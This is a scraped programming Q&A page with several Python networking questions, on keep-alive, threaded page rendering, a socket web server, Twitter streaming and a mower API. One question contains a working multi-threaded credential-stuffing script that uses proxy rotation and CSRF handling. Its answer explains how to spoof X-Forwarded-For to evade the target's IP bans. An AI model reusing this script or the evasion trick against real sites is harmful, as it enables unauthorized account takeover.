keep-alive messages not being sent when using python request module - python

I am observing that with python requests module, HTTP keep-alive is not being honored.
I dont see Acks for keep-alive being sent from the host where i am running the python script.
Please let me know how it can be fixed.Following is my code:
import json
import requests
import logging
import sys
import time
from threading import Thread
logging.basicConfig(level=logging.DEBUG)
class NSNitro:
def __init__(self,*args):
if len(args) > 2:
self.ip = args[0]
self.username = args[1]
self.password = args[2]
self.session_id = None
url = 'http://'+self.ip+'/nitro/v1/config/login'
payload = { "login": { "username":"nsroot", "password":"nsroot" }}
headers = {"Content-type": "application/json", 'Connection': 'keep-alive'}
try:
r = requests.post(url=url,headers=headers,data=json.dumps(payload),timeout=5)
logging.info(r.json()["sessionid"])
if(r.json()["sessionid"] != None):
self.session_id = r.json()["sessionid"]
except requests.exceptions.RequestException:
logging.critical("Some error occurred during connection")
else:
logging.error("Not sufficient parameters provided.Required : ipaddress , username , password")
def install_build(self,build_url):
url = 'http://ip/nitro/v1/config/install'
headers = {"Content-type": "application/json","Connection": "keep-alive"}
payload = {"install": {"url": build_url}}
try:
cookie = {"NITRO_AUTH_TOKEN": self.session_id}
r = requests.post(timeout=5, url=url, data=json.dumps(payload), headers=headers,cookies=cookie)
except requests.exceptions.RequestException:
print("Connection Error occurred")
raise '''this will give details of exception'''
else:
assert r.status_code == 201, "Status code seen: " + str(r.status_code) + "\n" + "Error message from system: " + \
r.json()["message"]
print("Successfully triggered job on device to install build")
def __del__(self):
logging.debug("Deleted the object")
if __name__ == '__main__':
ns_session = NSNitro(ip,username,password)
url_i = 'https://myupload-server.net/build-13.0-480.16.tgz'
t1 = Thread(target=ns_session.install_build,args=(url_i,))
t1.start()
''' while t1.is_alive():
t2 = Thread(target=ns_session.get_installed_version,)
t2.start()
t2.join()'''
time.sleep(100)
logging.info("Install thread completed")
t1.join()
ns_session.logout()
When the request is posted using curl command, the acks are sent in specified keep-alive intervals. Without ack being sent , server is resetting the connection.

Related

How to use html.render inside a thread?

When trying to send a function to the stream that parses the page and then executes the html.render, an error occurs:
Error: There is no current event loop in thread 'Thread-1 (take_proxy_us_spys_one_thread)
I started talking about a similar problem and realized that a friend here somehow managed to implement this. But I still get an error.
Here is my code which should be repeated all the time.
Help, please, to understand.
import urllib3
import requests
import time
from requests_html import HTMLSession
import threading
import fake_useragent
def take_proxy_us_spys_one(urls: list=[], header:dict = None,):
for url in urls:
try:
url_first = 'https://spys.one'
r = requests.get(url_first, headers=header)
cookies = r.cookies
session = HTMLSession()
r = session.post(url,
data={'xx00': '','xpp': '5','xf1': '0','xf2': '0','xf3': '0','xf4': '0', 'xf5': '0'},
headers=header,
cookies=cookies)
r.html.render(reload=False,)
print(str(r))
except Exception as exc:
print("Error: " + str(exc))
def take_proxy_us_spys_one_thread(event, sleeptime= 60, urls=[], lock = None):
while event.is_set():
try:
user = fake_useragent.UserAgent().random
header = {'User-Agent': user}
lock.acquire() if lock!=None else None
proxies_1 = take_proxy_us_spys_one(urls=urls, header=header)
lock.release() if lock != None else None
time.sleep(sleeptime)
except Exception as exc:
print("Error: " + str(exc))
time.sleep(sleeptime)
if __name__ == '__main__':
start_in_thread = True
urllib3.disable_warnings()
urls_spys_one = [
'https://spys.one/free-proxy-list/ALL/'
]
lock = threading.Lock()
event = threading.Event()
event.set()
t2 = threading.Thread(target=take_proxy_us_spys_one_thread, args=(event, 10, urls_spys_one, lock),).start()
I tried to implement the mechanism from here.

Python socket programmed web server doesnt send information to browser

I create a simple web server using python socket programming. When I access it using a socket programmed client I get this response (which seems to be good):
HTTP/1.0 200 OK
Content-Length: 145
Content-Type: text/html
"""<!DOCTYPE html>
<html>
<body>
<h2>HTML Links</h2>
<p>Visit our HTML tutorial</p>
</body>
</html>"""
However, when I try to access 127.0.0.1:80 on the browser it says:
127.0.0.1 didn’t send any data. ERR_EMPTY_RESPONSE
Web Server Code:
import socket
import os
def get_content_type(filename):
index = filename.rfind('.')
extension = filename[index+1:len(filename)]
if(extension == 'txt' or extension == 'html'):
return 'Content-Type: text/html\n'
elif(extension == 'jpg'):
return 'Content Type: image/jpeg\n'
elif(extension == 'js'):
return 'Content Type: text/javascript; charset=UTF 8\n'
elif(extension == 'css'):
return 'Content Type: text/css\n'
pass
def check_client_request(client_request):
request_splitted = client_request.split()
if(len(request_splitted) != 3):
return False
if(request_splitted[0] != 'GET'):
return False
if(request_splitted[1].find('http://') != 0):
return False
if(request_splitted[1].count('/') < 3):
return False
if(request_splitted[2] != 'HTTP/1.1\\r\\n'):
return False
return True
def recieve_client_request(client_socket):
client_request = client_socket.recv(1024)
return client_request.decode('utf-8')
def handle_client_request(request):
try:
filename = request.split()[1].split('/')[3]
except:
return 'File not found'
if(filename == ''):
filename = 'index.html'
path = f'C:\\Users\\Eitan\\Desktop\\Python-Course\\SOCKETWEBSERVER\\{filename}'
print(path)
response = ''
if(os.path.isfile(path)):
try:
requested_file = open(path, 'r')
file_content = requested_file.read()
requested_file.close()
response = 'HTTP/1.0 200 OK\n'
content_length = len(file_content.encode('utf-8'))
response += f'Content-Length: {content_length}\n'
response += get_content_type(filename)
response += '\n'
response += f'"""{file_content}"""'
except:
response = 'HTTP/1.1 404 Not Found\n'
else:
response = 'HTTP/1.1 404 Not Found\n'
return response
def send_response(client_socket, response):
try:
client_socket.send(response.encode('utf-8'))
print('Response Sent')
except:
print('Couldnt send response.')
def main():
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(('0.0.0.0', 80))
server_socket.listen(1)
while True:
client_socket = server_socket.accept()[0]
client_request = recieve_client_request(client_socket)
if(check_client_request(client_request)):
response = handle_client_request(client_request)
send_response(client_socket, response)
client_socket.close()
else:
client_socket.close()
if(__name__ == '__main__'):
main()
Client Code:
import socket
def main():
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(('127.0.0.1', 80))
request = input("Command: ").encode('utf-8')
client_socket.send(request)
response = client_socket.recv(1024)
print(response.decode('utf-8'))
if(__name__ == '__main__'):
main()
if(request_splitted[1].find('http://') != 0):
return False
You expect the browser to send a request like this
GET http://domain/page HTTP/1.1
...
But, a normal HTTP request does not include protocol and host but only the page, i.e. it looks like this
GET /page HTTP/1.1
...
Since you treat the valid request from the browser as invalid you close the connection and thus no response is sent to the browser.
Note that HTTP is not that simple as it might look. There is an actual standard for this which is quite long and which you are expected to follow when implementing a HTTP server or client.

Sending Asynchronous requests with Python requests library

As a part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that I've come up with following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
global proxy_queue
global user_queue
global hits
global stats
global start_time
def get_default_header():
return {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'https://www.example.com/'
}
def make_requests():
global user_queue
while True:
uname_pass = user_queue.get().split(':')
status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
if status == 1:
hits.put(uname_pass)
stats['hits'] += 1
if status == 0:
stats['fake'] += 1
if status == -1:
user_queue.put(':'.join(uname_pass))
stats['IP Banned'] += 1
if status == -2:
stats['Exception'] += 1
user_queue.task_done()
def get_status(uname, password):
global proxy_queue
try:
if proxy_queue.empty():
print 'Reloaded proxies, sleeping for 2 mins'
sleep(120)
session = requests.session()
proxy = 'http://' + proxy_queue.get()
login_url = 'http://example.com/login'
header = get_default_header()
header['X-Forwarded-For'] = '8.8.8.8'
login_page = session.get(
login_url,
headers=header,
proxies={
'http':proxy
}
)
tree = html.fromstring(login_page.text)
csrf = list(set(tree.xpath("//input[#name='csrfmiddlewaretoken']/#value")))[0]
payload = {
'email': uname,
'password': password,
'csrfmiddlewaretoken': csrf,
}
result = session.post(
login_url,
data=payload,
headers=header,
proxies={
'http':proxy
}
)
if result.status_code == 200:
if 'access_token' in session.cookies:
return 1
elif 'Please check your email and password.' in result.text:
return 0
else:
# IP banned
return -1
else:
# IP banned
return -1
except Exception as e:
print e
return -2
def populate_proxies():
global proxy_queue
proxy_queue = Queue()
with open('nice_proxy.txt', 'r') as f:
for line in f.readlines():
proxy_queue.put(line.replace('\n', ''))
def hit_printer():
while True:
sleep(5)
print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),
if __name__ == '__main__':
global user_queue
global proxy_queue
global stats
global start_time
stats = dict()
stats['hits'] = 0
stats['fake'] = 0
stats['IP Banned'] = 0
stats['Exception'] = 0
threads = 200
hits = Queue()
uname_password_file = '287_uname_pass.txt'
populate_proxies()
user_queue = Queue(threads)
for i in range(threads):
t = Thread(target=make_requests)
t.daemon = True
t.start()
hit_printer = Thread(target=hit_printer)
hit_printer.daemon = True
hit_printer.start()
start_time = time.time()
try:
count = 0
with open(uname_password_file, 'r') as f:
for line in f.readlines():
count += 1
if count > 2000:
break
user_queue.put(line.replace('\n', ''))
user_queue.join()
print '####################Result#####################'
while not hits.empty():
print hits.get()
ttr = round(time.time() - start_time, 3)
print 'Time required: ' + str(ttr)
print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
except Exception as e:
print e
So it is expected to make many requests on the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned, and it stops working. Since I'm disposing off the proxy after I use it, it shouldn't be the case. So I believe it might be due to one of the following
In an attempt to make multiple requests using multiple sessions, it's somehow failing to maintain disparateness for not supporting asynchronicity.
The victim site bans IPs based on its groups e.g., Banning all IPs starting with 132.x.x.x on receiving multiple requests from any of the 132.x.x.x IPs
The victim site is using headers like 'X-Forwarded-for', 'Client-IP', 'Via', or a similar header to detect the originating IP. But it seems unlikely because I can log in via by browser, without any proxy, and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure weather I'm making an error in the threading part or the requests part, any help is appreciated.
I have figured out what the problem was, thanks to #Martijn Pieters, as usual, he's a life saver.
I was using elite level proxies and there was no way the victim site could have found my IP address, however, it was using X-Forwarded-For to detect my root IP address.
Since elite level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was using the latest address in X-Forwarded-For. The solution to this problem is setting the X-Forwarded-For header to a random IP address everytime a requests is made which successfully spoofs the victim site into believing that the request is legit.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])

twisted twitter streaming api bad request error

I am using python twisted to get streaming data from twitter streaming api.There are two steps in short. 1) get access_token 2) use access_token to make request for the data.
step 1 work completely fine but at step 2 i am gettin gthis error of bad request status 400. why is so? I think its because twitter uses HTTP1.1 and twisted is using HTTP1.0 by deafult. then how to upgrade connections to HTTP1.1
EDIT: Here is my error message
HTTP/1.0 400 Bad Request
content-length: 0
date: Sun, 12 Mar 2017 14:57:13 GMT
server: tsa
x-connection-hash: dca361a2b4214ad66203e9912b05cf7f
[Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.ConnectionDone'>: Connection was closed cleanly.
.
#!/usr/bin/python
import oauth2 as oauth
import urlparse
import time
import webbrowser
from twisted.internet import reactor, protocol, ssl
from twisted.web import http
CONSUMER_KEY = 'xxxx'
CONSUMER_SECRET = 'xxxx'
CONSUMER = oauth.Consumer(CONSUMER_KEY, CONSUMER_SECRET)
ACCESS_TOKEN_FILE = 'OAUTH_ACCESS_TOKEN'
TWITTER_REQUEST_TOKEN_URL = 'https://twitter.com/oauth/request_token'
TWITTER_ACCESS_TOKEN_URL = 'https://twitter.com/oauth/access_token'
TWITTER_AUTHORIZE_URL = 'https://twitter.com/oauth/authorize'
TWITTER_STREAM_API_HOST = 'stream.twitter.com'
TWITTER_STREAM_API_PATH = '/1.1/statuses/sample.json'
class TwitterStreamer(http.HTTPClient):
def connectionMade(self):
self.sendCommand('GET', self.factory.url)
self.sendHeader('Host', self.factory.host)
self.sendHeader('User-Agent', self.factory.agent)
self.sendHeader('Authorization', self.factory.oauth_header)
self.endHeaders()
def handleStatus(self, version, status, message):
if status != '200':
self.factory.tweetError(ValueError("bad status"))
def lineReceived(self, line):
self.factory.tweetReceived(line)
def connectionLost(self, reason):
self.factory.tweetError(reason)
class TwitterStreamerFactory(protocol.ClientFactory):
protocol = TwitterStreamer
def __init__(self, oauth_header):
self.url = TWITTER_STREAM_API_PATH
self.agent = 'Twisted/TwitterStreamer'
self.host = TWITTER_STREAM_API_HOST
self.oauth_header = oauth_header
def clientConnectionFailed(self, _, reason):
self.tweetError(reason)
def tweetReceived(self, tweet):
print tweet
def tweetError(self, error):
print error
def save_access_token(key, secret):
with open(ACCESS_TOKEN_FILE, 'w') as f:
f.write("ACCESS_KEY=%s\n" % key)
f.write("ACCESS_SECRET=%s\n" % secret)
def load_access_token():
with open(ACCESS_TOKEN_FILE) as f:
lines = f.readlines()
str_key = lines[0].strip().split('=')[1]
str_secret = lines[1].strip().split('=')[1]
return oauth.Token(key=str_key, secret=str_secret)
def fetch_access_token():
CONSUMER_KEY = 'xxxxxxxx'
CONSUMER_SECRET = 'xxxxxxxxx'
ACCESS_KEY="xxxxxxx"
ACCESS_SECRET="xxxxxxxxx"
consumer = oauth.Consumer(key=CONSUMER_KEY, secret=CONSUMER_SECRET)
access_token = oauth.Token(key=ACCESS_KEY, secret=ACCESS_SECRET)
return (access_token.key, access_token.secret)
def build_authorization_header(access_token):
url = "https://%s%s" % (TWITTER_STREAM_API_HOST, TWITTER_STREAM_API_PATH)
params = {
'oauth_version': "1.0",
'oauth_nonce': oauth.generate_nonce(),
'oauth_timestamp': str(int(time.time())),
'oauth_token': access_token.key,
'oauth_consumer_key': CONSUMER.key
}
# Sign the request.
# For some messed up reason, we need to specify is_form_encoded to prevent
# the oauth2 library from setting oauth_body_hash which Twitter doesn't like.
req = oauth.Request(method="GET", url=url, parameters=params, is_form_encoded=True)
req.sign_request(oauth.SignatureMethod_HMAC_SHA1(), CONSUMER, access_token)
# Grab the Authorization header
header = req.to_header()['Authorization'].encode('utf-8')
print "Authorization header:"
print " header = %s" % header
return header
if __name__ == '__main__':
# Check if we have saved an access token before.
try:
f = open(ACCESS_TOKEN_FILE)
except IOError:
# No saved access token. Do the 3-legged OAuth dance and fetch one.
(access_token_key, access_token_secret) = fetch_access_token()
# Save the access token for next time.
save_access_token(access_token_key, access_token_secret)
# Load access token from disk.
access_token = load_access_token()
# Build Authorization header from the access_token.
auth_header = build_authorization_header(access_token)
# Twitter stream using the Authorization header.
twsf = TwitterStreamerFactory(auth_header)
reactor.connectSSL(TWITTER_STREAM_API_HOST, 443, twsf, ssl.ClientContextFactory())
reactor.run()
UPDATE: Working code:
import base64, urllib
from twisted.internet import reactor
from twisted.internet.defer import Deferred
from twisted.protocols import basic
from twisted.python.failure import DefaultException
from twisted.web.client import Agent
from twisted.web.http_headers import Headers
import json
import oauth2 as oauth
import time
from twisted.web import server,resource
from twisted.internet import endpoints
from twisted.web.server import Site
CONSUMER_KEY = 'xxxxxxxxxxxx'
CONSUMER_SECRET = 'xxxxxxxxxxxxxx'
TWITTER_STREAM_API_HOST = 'stream.twitter.com'
TWITTER_STREAM_API_PATH = '/1.1/statuses/sample.json'
ACCESS_TOKEN_FILE = 'OAUTH_ACCESS_TOKEN'
CONSUMER = oauth.Consumer(CONSUMER_KEY, CONSUMER_SECRET)
def callback(result):
print result
def errback(error):
print error
class StreamingParser(basic.LineReceiver):
delimiter = '\r\n'
def __init__(self, user_callback, user_errback):
self.user_callback = user_callback
self.user_errback = user_errback
def lineReceived(self, line):
d = Deferred()
d.addCallback(self.user_callback)
d.addErrback(self.user_errback)
line = line.strip()
print line,'........'
try:
d.callback(json.loads(line))
except ValueError, e:
if self.user_errback:
d.errback(e)
def connectionLost(self, reason):
if self.user_errback:
d = Deferred()
d.addErrback(self.user_errback)
d.errback(DefaultException(reason.getErrorMessage()))
def _get_response(response, callback, errback):
print 'got response......'
response.deliverBody(StreamingParser(callback, errback))
return Deferred()
def _shutdown(reason, errback):
d = Deferred()
d.addErrback(errback)
d.errback(reason)
if reactor.running:
reactor.stop()
def save_access_token(key, secret):
with open(ACCESS_TOKEN_FILE, 'w') as f:
f.write("ACCESS_KEY=%s\n" % key)
f.write("ACCESS_SECRET=%s\n" % secret)
def load_access_token():
with open(ACCESS_TOKEN_FILE) as f:
lines = f.readlines()
str_key = lines[0].strip().split('=')[1]
str_secret = lines[1].strip().split('=')[1]
return oauth.Token(key=str_key, secret=str_secret)
def fetch_access_token():
ACCESS_KEY="xxxxx-xxxx"
ACCESS_SECRET="xxxxxxxxxxxx"
access_token = oauth.Token(key=ACCESS_KEY, secret=ACCESS_SECRET)
return (access_token.key, access_token.secret)
def make_header(access_token):
url = "https://%s%s" % (TWITTER_STREAM_API_HOST, TWITTER_STREAM_API_PATH)
params = {
# "Authorization": "Oauth %s" % auth,
"oauth_version": "1.0",
"oauth_nonce": oauth.generate_nonce(),
"oauth_timestamp": str(int(time.time())),
"oauth_token": access_token.key,
"oauth_consumer_key": CONSUMER.key
}
req = oauth.Request(method="GET", url=url, parameters=params, is_form_encoded=True)
req.sign_request(oauth.SignatureMethod_HMAC_SHA1(), CONSUMER, access_token)
header = req.to_header()['Authorization'].encode('utf-8')
print "Authorization header:"
print " header = %s" % header
return header
def start_streaming():
print 'streaming started...........'
try:
f = open(ACCESS_TOKEN_FILE)
except IOError:
access_token_key, access_token_secret = fetch_access_token()
save_access_token(access_token_key, access_token_secret)
access_token = load_access_token()
auth_header = make_header(access_token)
url = 'https://stream.twitter.com/1.1/statuses/sample.json'
headers = Headers({
'User-Agent': ['TwistedSTreamReciever'],
'Authorization': [auth_header]})
agent = Agent(reactor)
d = agent.request('GET', url, headers, None)
d.addCallback(_get_response, callback, errback)
d.addBoth(_shutdown, errback)
# reactor.run()
class _Stream(resource.Resource):
isLeaf = True
def render_GET(self, request):
start_streaming()# Streaming started here.......
time.sleep(8) # wait for 8 seconds...
########.........??? stop streaming here??
return "<html>streaming started...........%s</html>" % (time.ctime(),)
if __name__ == "__main__":
resource = _Stream()
factory = Site(resource)
endpoint = endpoints.TCP4ServerEndpoint(reactor, 8880)
endpoint.listen(factory)
reactor.run()
To give up on reading a particular streaming response (which it seems may be necessary - I'm guessing these Twitter streams never end on their own) and close the connection associated with that request/response (because HTTP has no other way to give up on a response), use the body delivery protocol's transport.loseConnection method. So, for example:
def _get_response(response, callback, errback):
print 'got response......'
proto = StreamingParser(callback, errback)
save_stream_by_name(stream_name, proto)
response.deliverBody(proto)
return Deferred()
When you're done with that stream:
pop_stream_by_name(stream_name).transport.loseConnection()

Python split up data from print string

This is my first post here, if my post dont follow the "standard" you know why.
And iam realy new to python and programming, i am trying to learn as i go.
I am using a script thats Controls my Husqvarna Automower
In that script there is a line that i dont understand and i would like to change the outcome of.
print(dict(mow.status()['mowerInfo']))
When i run the script i get an print out like this
{u'storedTimestamp': u'1472541846629', u'hdop': u'0.0', u'latitude': u'57.57320833333333', u'lastErrorCode': u'0', u'nextStartTimestamp': u'1472587200', u'mowerStatus': u'PARKED_TIMER', u'cachedSettingsUUID': u'c1029c29-ecd5-48bd-a27b-fa98c6985ff0', u'hostMessage': u'0', u'configChangeCounter': u'846', u'longitude': u'12.04773', u'nextStartSource': u'WEEK_TIMER', u'secondsOld': u'-1471069304597', u'gpsStatus': u'USING_GPS_MAP', u'gsmRssi': u'0', u'batteryPercent': u'100', u'connected': u'true', u'operatingMode': u'AUTO', u'lastErrorCodeTimestamp': u'0'}
I understands that this line executes the "status" function and prints the outcome, but i dont realy understand the dict and the ['mowerInfo'] and why i cant find any referens to ['mowerInfo'] anywere else in the script. As i understand there should be a dictonary in the script. But i cant find it.
And now to accual the question
Insteed of the print command, a would like to get som of the information parsed inte variables insteed.
For examples would i like to have a variable called mowerStatus and it should have the value PARKED_TIMER and a variable called batteryPercent and it should have the value 100
The script is runned by a smarthomesolution called Indigodomo and is runed on a mac using python 2.6
Anyone knows how to do that?
I have modified the script from the original
here is my modified script (with my credential XXed out)
import requests
import xmltodict
class API:
_API_IM = 'https://tracker-id-ws.husqvarna.net/imservice/rest/'
_API_TRACK = 'https://tracker-api-ws.husqvarna.net/services/'
def __init__(self):
self.session = requests.Session()
self.device_id = None
self.push_id = None
def login(self, login, password):
request = ("<login>"
" <email>%s</email>"
" <password>%s</password><language>fr-FR</language>"
"</login>") % (login, password)
response = self.session.post(self._API_IM + 'im/login',
data=request, headers={'Content type': 'application/xml'})
response.raise_for_status()
self.session.headers.update({'Session-Token': response.headers['Session-Token']})
self.select_first_robot()
def logout(self):
response = self.session.post(self._API_IM + 'im/logout')
response.raise_for_status()
self.device_id = None
del (self.session.headers['Session-Token'])
def list_robots(self):
response = self.session.get(self._API_TRACK + 'pairedRobots_v2')
response.raise_for_status()
result = xmltodict.parse(response.content)
return result
def select_first_robot(self):
result = self.list_robots()
self.device_id = result['robots']['robot']['deviceId']
def status(self):
response = self.session.get(self._API_TRACK + 'robot/%s/status_v2/' % self.device_id)
response.raise_for_status()
result = xmltodict.parse(response.content)
return result
def geo_status(self):
response = self.session.get(self._API_TRACK + 'robot/%s/geoStatus/' % self.device_id)
response.raise_for_status()
result = xmltodict.parse(response.content)
return result
def get_mower_settings(self):
request = ("<settings>"
" <autoTimer/><gpsSettings/><drivePastWire/>"
" <followWireOut><startPositionId>1</startPositionId></followWireOut>"
" <followWireOut><startPositionId>2</startPositionId></followWireOut>"
" <followWireOut><startPositionId>3</startPositionId></followWireOut>"
" <followWireOut><startPositionId>4</startPositionId></followWireOut>"
" <followWireOut><startPositionId>5</startPositionId></followWireOut>"
" <followWireIn><loopWire>RIGHT_BOUNDARY_WIRE</loopWire></followWireIn>"
" <followWireIn><loopWire>GUIDE_1</loopWire></followWireIn>"
" <followWireIn><loopWire>GUIDE_2</loopWire></followWireIn>"
" <followWireIn><loopWire>GUIDE_3</loopWire></followWireIn>"
" <csRange/>"
" <corridor><loopWire>RIGHT_BOUNDARY_WIRE</loopWire></corridor>"
" <corridor><loopWire>GUIDE_1</loopWire></corridor>"
" <corridor><loopWire>GUIDE_2</loopWire></corridor>"
" <corridor><loopWire>GUIDE_3</loopWire></corridor>"
" <exitAngles/><subareaSettings/>"
"</settings>")
response = self.session.post(self._API_TRACK + 'robot/%s/settings/' % self.device_id,
data=request, headers={'Content-type': 'application/xml'})
response.raise_for_status()
result = xmltodict.parse(response.content)
return result
def settingsUUID(self):
response = self.session.get(self._API_TRACK + 'robot/%s/settingsUUID/' % self.device_id)
response.raise_for_status()
result = xmltodict.parse(response.content)
return result
def control(self, command):
if command not in ['PARK', 'STOP', 'START']:
raise Exception("Unknown command")
request = ("<control>"
" <action>%s</action>"
"</control>") % command
response = self.session.put(self._API_TRACK + 'robot/%s/control/' % self.device_id,
data=request, headers={'Content-type': 'application/xml'})
response.raise_for_status()
def add_push_id(self, id):
request = "id=%s&platform=iOS" % id
response = self.session.post(self._API_TRACK + 'addPushId', data=request,
headers={'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8'})
response.raise_for_status()
self.push_id = id
def remove_push_id(self):
request = "id=%s&platform=iOS" % id
response = self.session.post(self._API_TRACK + 'removePushId', data=request,
headers={'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8'})
response.raise_for_status()
self.push_id = None
if __name__ == '__main__':
retry = 5
while retry > 0:
try:
mow = API()
mow.login("xxx#xxx.com", "xxxxxx")
print(dict(mow.status()['mowerInfo']))
retry = 0
except Exception as ex:
retry -= 1
if retry == 0:
print("[ERROR] Retrying to send the command")
else:
print("[ERROR] Failed to send the command")
exit(1)
print("Done")
mow.logout()
exit(0)
The orgiginal Project and script can bee find here
https://github.com/chrisz/pyhusmow
Thanx Martin
dic_info = dict(mow.status()['mowerInfo'])
mowerStatus = dic_info.get('mowerStatus')
batteryPercent = dic_info.get('batteryPercent')

Categories

Resources